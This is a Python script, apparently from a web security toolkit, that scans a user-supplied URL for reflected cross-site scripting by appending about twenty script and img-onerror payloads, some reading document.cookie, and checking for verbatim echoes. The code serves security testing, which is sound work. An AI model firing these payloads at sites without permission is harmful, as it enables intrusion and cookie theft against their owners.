import requests
from utils import save_results
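def _results_filename(url):
    """Return the JSON file name the results of a run against *url* are saved under.

    The original name-building step only stripped the scheme and swapped ``/``
    for ``_``; every other character of the user-typed URL (``\\``, ``?``,
    ``&``, ``=``, ``:`` ...) went straight into a file name, and a ``\\`` is a
    path separator on Windows. Here only ASCII letters, digits, ``-``, ``.`` and
    ``_`` are kept and everything else becomes ``_``. The fixed ``xss_test_``
    prefix also guarantees the name is never empty, ``.`` or ``..``.
    """
    body = url.replace("http://", "").replace("https://", "")
    safe = "".join(
        ch if (ch.isascii() and ch.isalnum()) or ch in "-._" else "_"
        for ch in body
    )
    return f"xss_test_{safe}.json"


def test_xss():
    """Interactively probe one URL for reflected XSS and optionally save the results.

    Reads a URL from stdin, appends each entry of ``xss_payloads`` to it and
    issues a plain GET with a 5 s timeout. A payload is recorded as
    ``vulnerable`` only when the exact payload string appears in the response
    body; that is a candidate finding, not proof a browser would execute it
    (the echo may sit in an HTML comment, a ``<textarea>`` or a non-HTML
    content type), and reflections the server encodes or alters are not
    detected at all. Request failures are printed and the payload is skipped,
    so it does not appear in ``results``. Finally the user is asked whether to
    persist ``results`` through ``save_results``.

    Returns:
        None. Side effects: network requests to the given URL, console output,
        and optionally a JSON file written via ``save_results``.
    """
    url = input("Digite a URL para teste de XSS: ").strip()
    xss_payloads = [
        "<script>alert('XSS')</script>",
        "<img src=x onerror=alert('XSS')>",
        "'\"><script>alert('XSS')</script>",
        "<script>alert(document.cookie)</script>",
        "<script>document.write('<img src=x onerror=alert('XSS')>')</script>",
        "<script>prompt(document.cookie)</script>",
        "<script>confirm(document.cookie)</script>",
        "<script>console.log(document.cookie)</script>",
        "<script>console.log('XSS')</script>",
        "<script>console.warn('XSS')</script>",
        "<script>console.error('XSS')</script>",
        "<script>console.info('XSS')</script>",
        "<script>console.debug('XSS')</script>",
        "<script>console.trace('XSS')</script>",
        "<script>console.dir('XSS')</script>",
        "<script>console.dirxml('XSS')</script>",
        "<script>console.group('XSS')</script>",
        "<script>console.groupEnd('XSS')</script>",
        "<script>console.table('XSS')</script>",
        "<script>console.count('XSS')</script>",
    ]
    results = []
    for payload in xss_payloads:
        try:
            # Request is sent as-is; the check below is verbatim reflection only.
            response = requests.get(url + payload, timeout=5)
        except requests.exceptions.RequestException as e:
            # Best-effort: report and move on; an empty/invalid URL ends up here
            # (MissingSchema is a RequestException) rather than crashing the run.
            print(f"Erro ao testar payload '{payload}': {e}")
            continue
        reflected = payload in response.text
        results.append({"payload": payload, "vulnerable": reflected})
        if reflected:
            print(f"Vulnerabilidade XSS encontrada com payload: {payload}")
    save = input("Deseja salvar os resultados? (s/n): ")
    if save.strip().lower() == 's':
        # File name is derived from user input: restrict it to a safe charset.
        save_results(results, "xss_results", _results_filename(url))
        print("Resultados salvos.")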